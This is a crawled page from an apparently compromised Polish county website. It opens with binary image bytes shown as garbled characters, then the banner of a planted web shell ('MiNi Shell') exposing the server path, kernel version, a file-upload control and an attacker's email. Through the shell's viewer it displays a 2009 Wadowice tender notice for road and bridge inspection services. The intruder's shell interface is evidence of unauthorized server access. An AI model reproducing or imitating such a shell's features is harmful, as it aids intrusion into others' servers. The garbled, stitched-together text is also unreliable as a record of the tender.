JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090424/119878-N-2009.html

<p class="kh_header"><b>Wadowice: Pełnienie funkcji inspektora nadzoru nad robotami drogowo-mostowymi wykonywanymi w ciągach dróg powiatowych wg  3 zadań: Zadanie nr 1 Przebudowa i remont dróg powiatowych; Zadanie nr 2 Budowa i przebudowa chodników; Zadanie nr 3 Remont mostów</b><br>
<b>Numer ogłoszenia: 119878 - 2009; data zamieszczenia: 24.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Wadowicki , ul. Batorego 2, 34-100 Wadowice, woj. małopolskie, tel. 033 8734200, faks 033 8232433.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starostwo.wadowice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru nad robotami drogowo-mostowymi wykonywanymi w ciągach dróg powiatowych wg  3 zadań: Zadanie nr 1 Przebudowa i remont dróg powiatowych; Zadanie nr 2 Budowa i przebudowa chodników; Zadanie nr 3 Remont mostów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia: Pełnienie funkcji inspektora nadzoru inwestorskiego nad realizacją robót drogowo-mostowych wykonywanych w ciągach dróg powiatowych związanych z: Zad. nr 1. Przebudową i remontem dróg powiatowych - wartości robót ok. 4.500.000,00 zł w tym; roboty nawierzchniowe, poprawa odwodnienia - rowy, pobocza, urządzenia bezpieczeństwa ruchu, itp. 
Zad. na 2. Przebudową i budową chodników - wartość robót ok. 1.300.000,00 zł w tym; roboty rozbiórkowe, wykonanie nawierzchni chodnika wraz z ustawieniem krawężników i obrzeży, wykonanie kanalizacji deszczowej, studzienek ściekowych, rewizyjnych itp. Zad. nr 3. Remont mostów - wartości robót ok. 300.000,00 zł w tym; remont mostu stalowego z pomostem drewnianym- wymiana drewna; remont mostu sprężonego betonowego - remont balustrad, gzymsów, zabezpieczenie antykorozyjne, wymiana dylatacji, krawężników itp. Wartość robót może ulec zmianie.
Realizacja zamówienia - Pełnienie funkcji inspektora nadzoru inwestorskiego będzie odbywać się w okresie wykonywania-realizacji robót budowlanych na poszczególnych obiektach w ramach wymienionych zadań. Terminy rozpoczęcia i zakończenia robót objętych niniejszym zamówieniem uzależnione są od przebiegu postępowań przetargowych na wyłonienie Wykonawców robót budowlanych dla wyżej określonych zadań i wchodzących w nie obiektów. Zakres czynności inspektora określony ustawą - z dnia 7 lipca 1994r. - Prawo budowlane (tekst jednolity Dz.U. z 2006r nr 156 poz. 1118 z późn. zm.). Wartość zamówienia jest mniejsza niż kwoty, od których jest uzależniony obowiązek przekazywania ogłoszeń UOPWE.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.63.10.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią niżej określone warunki: 1. Warunki ogólne: 1.1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 1.2. Posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i  osobami zdolnymi do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego lub osób zdolnych do wykonania zamówienia  1.3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 1.4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 Pzp. 1.5. Zapewnią realizację zamówienia zgodnie z Prawem budowlanym.
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. w formie spółki cywilnej lub konsorcjum). W takim przypadku Wykonawcy winni upoważnić jednego spośród siebie jako przedstawiciela pozostałych do reprezentowania ich w postępowaniu o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia publicznego a jego upoważnienie musi być udokumentowane pełnomocnictwem podpisanym przez uprawnionych przedstawicieli wszystkich pozostałych wykonawców. Przedmiotowe pełnomocnictwo musi zostać dołączone do oferty w oryginale lub odpisie potwierdzonym notarialnie. Warunki opisane wyżej, w pkt 1.1 oraz 1.4, musi spełniać każdy z wykonawców działających wspólnie. Jeżeli za najkorzystniejszą uznana zostanie oferta wykonawcy ubiegającego się wspólnie o udzielenie zamówienia Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców. Wykonawca będzie zobowiązany do przedstawienia zamawiającemu oryginału umowy do wglądu oraz do pozostawienia kserokopii potwierdzonej za zgodność z oryginałem właściwej umowy np. konsorcjum, która określi zakres, formę działalności i sposób rozliczania się uczestników. 2. Warunki szczegółowe: 2.1.	posiadana wiedza i doświadczenie - w formie załączonego do oferty oświadczenia-wykazu wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia (z podaniem wartości, okresu realizacji i miejsca wykonania robót oraz nazwy Inwestora), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizował z należytą starannością co najmniej jedną usługę odpowiadającą swoim rodzajem usługom stanowiącym przedmiot zamówienia. 2.2. osoby zdolne do wykonania zamówienia - Wykonawca winien wykazać, że osoba, która będzie uczestniczyć w wykonywaniu zamówienia - Inspektor nadzoru inwestorskiego posiada wymagane uprawnienia zawodowe w zakresie nadzoru inwestorskiego dla robót wynikających z niniejszego zamówienia oraz przynależy do właściwej Izby Samorządu Zawodowego. Do oferty należy dołączyć aktualną kopię potwierdzoną za zgodność z oryginałem uprawnień zawodowych oraz aktualne zaświadczenie o wpisie na listę członków właściwej Izby Samorządu Zawodowego. 2.3. Zamówienie nie może być realizowane przez podwykonawców. 2.4. Wykonawca-Inspektor złoży oświadczenie, że posiada dyspozycyjność odpowiednią do pełnienia nadzoru nad robotami będącymi przedmiotem zamówienia.  2.5. Wykonawca winien wypełnić oraz podpisać wszystkie formularze i załączniki stanowiące treść oferty lub złożyć ofertę odpowiadającą ich treści, podpisać wzór umowy oraz dołączyć wszystkie dokumenty i oświadczenia wynikające z SIWZ.  Ocena spełnienia powyższych warunków udziału w postępowaniu dokonywana będzie metodą 0-1, tj. spełnia lub nie spełnia, w oparciu o dokumenty, oświadczenia i inne materiały dołączone do oferty.  Każde Zadanie będzie rozpatrywane oddzielnie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku wspólnego ubiegania się o zamówienie dotyczy to każdego z uczestników.
2. Uprawnienia - dokument stwierdzający, że osoba, która będzie wykonywać zamówienie posiada wymagane uprawnienia do wykonywania powyższych prac wraz z aktualnym zaświadczeniem o przynależności do właściwej Izby Samorządu Zawodowego.  3.	Wypełniony Formularz oferty dla każdego zadania oddzielnie.
4. Oświadczenie, że Wykonawca spełnia wymagania określone w art. 22 ust. 1 Pzp oraz nie podlega wykluczeniu z postępowania na podstawie art. 24 Pzp. 5. Podpisany wzór umowy dla każdego zadania oddzielnie. 6. Posiadana wiedza i doświadczenie - wykaz usług wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował z należytą starannością co najmniej jedną usługę odpowiadającą swoim rodzajem usługom stanowiącym przedmiot zamówienia wraz z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie. 7. Oświadczenie Wykonawcy o dyspozycyjności. 8. Pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. Pełnomocnictwo winno zostać złożone jako część oferty w oryginale lub kopii poświadczonej notarialnie. 9. Pełnomocnictwo do reprezentowania Wykonawców w przedmiotowym postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia w przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Pełnomocnictwo winno zostać złożone jako część oferty w oryginale lub kopii poświadczonej notarialnie. 10. Dostarczane dokumenty (za wyjątkiem pełnomocnictw oraz wynikających z załączników 1÷5 do SIWZ) mogą zostać złożone w formie kopii pod warunkiem poświadczenia ich za zgodność z oryginałem przez Wykonawcę. Zamawiający zastrzega sobie prawo żądania przedstawienia oryginałów w przypadku, gdy kopie będą nieczytelne lub będą wzbudzać wątpliwość, co do ich prawdziwości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiat.wadowice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Wadowicach, ul. Batorego 2  pok. nr 104 (I piętro)..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2009 godzina 10:30, miejsce: Starostwo Powiatowe w Wadowicach, ul. Batorego 2 w sekretariacie pok. nr 314 (III piętro)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie funkcji inspektora nadzoru nad robotami drogowo-mostowymi wykonywanymi w ciągach dróg powiatowych: Zadanie nr 1 Przebudowa i remont dróg powiatowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia:Pełnienie funkcji inspektora nadzoru inwestorskiego nad realizacją robót drogowo- mostowych wykonywanych w ciągach dróg powiatowych związanych z przebudową i remontem dróg powiatowych - wartości robót ok. 4.500.000,00 zł w tym; roboty nawierzchniowe, poprawa odwodnienia - rowy, pobocza, urządzenia bezpieczeństwa ruchu, itp. Wartość robót może ulec zmianie. Realizacja zamówienia - Pełnienie funkcji inspektora nadzoru inwestorskiego będzie odbywać się w okresie wykonywania-realizacji robót budowlanych na poszczególnych obiektach w ramach wymienionych zadań. Terminy rozpoczęcia i zakończenia robót objętych niniejszym zamówieniem uzależnione są od przebiegu postępowań przetargowych na wyłonienie Wykonawców robót budowlanych dla wyżej określonych zadań i wchodzących w nie obiektów.Zakres czynności inspektora określony ustawą - z dnia 7 lipca 1994r. - Prawo budowlane (tekst jednolity Dz.U. z 2006r nr 156 poz. 1118 z późn. zm.).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.63.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie funkcji inspektora nadzoru nad robotami drogowo-mostowymi wykonywanymi w ciągach dróg powiatowych: Zadanie nr 2 Budowa i przebudowa chodników.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia: Pełnienie funkcji inspektora nadzoru inwestorskiego nad realizacją robót drogowo-mostowych wykonywanych w ciągach dróg powiatowych związanych z przebudową i budową chodników - wartość robót ok. 1.300.000,00 zł w tym; roboty rozbiórkowe, wykonanie nawierzchni chodnika wraz z ustawieniem krawężników i obrzeży, wykonanie kanalizacji deszczowej, studzienek ściekowych, rewizyjnych itp. Wartość robót może ulec zmianie. Realizacja zamówienia - Pełnienie funkcji inspektora nadzoru inwestorskiego będzie odbywać się w okresie wykonywania-realizacji robót budowlanych na poszczególnych obiektach w ramach wymienionych zadań. Terminy rozpoczęcia i zakończenia robót objętych niniejszym zamówieniem uzależnione są od przebiegu postępowań przetargowych na wyłonienie Wykonawców robót budowlanych dla wyżej określonych zadań i wchodzących w nie obiektów. Zakres czynności inspektora określony ustawą - z dnia 7 lipca 1994r. - Prawo budowlane (tekst jednolity Dz.U. z 2006r nr 156 poz. 1118 z późn. zm.)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.63.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pełnienie funkcji inspektora nadzoru nad robotami drogowo-mostowymi wykonywanymi w ciągach dróg powiatowych: Zadanie nr 3 Remont mostów.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia: Pełnienie funkcji inspektora nadzoru inwestorskiego nad realizacją robót drogowo-mostowych wykonywanych w ciągach dróg powiatowych związanych z remontami mostów - wartości robót ok. 300.000,00 zł w tym; remont mostu stalowego z pomostem drewnianym- wymiana drewna; remont mostu sprężonego betonowego - remont balustrad, gzymsów, zabezpieczenie antykorozyjne, wymiana dylatacji, krawężników itp. Wartość robót może ulec zmianie. Realizacja zamówienia - Pełnienie funkcji inspektora nadzoru inwestorskiego będzie odbywać się w okresie wykonywania-realizacji robót budowlanych na poszczególnych obiektach w ramach wymienionych zadań. Terminy rozpoczęcia i zakończenia robót objętych niniejszym zamówieniem uzależnione są od przebiegu postępowań przetargowych na wyłonienie Wykonawców robót budowlanych dla wyżej określonych zadań i wchodzących w nie obiektów. Zakres czynności inspektora określony ustawą - z dnia 7 lipca 1994r. - Prawo budowlane (tekst jednolity Dz.U. z 2006r nr 156 poz. 1118 z późn. zm.)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.63.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com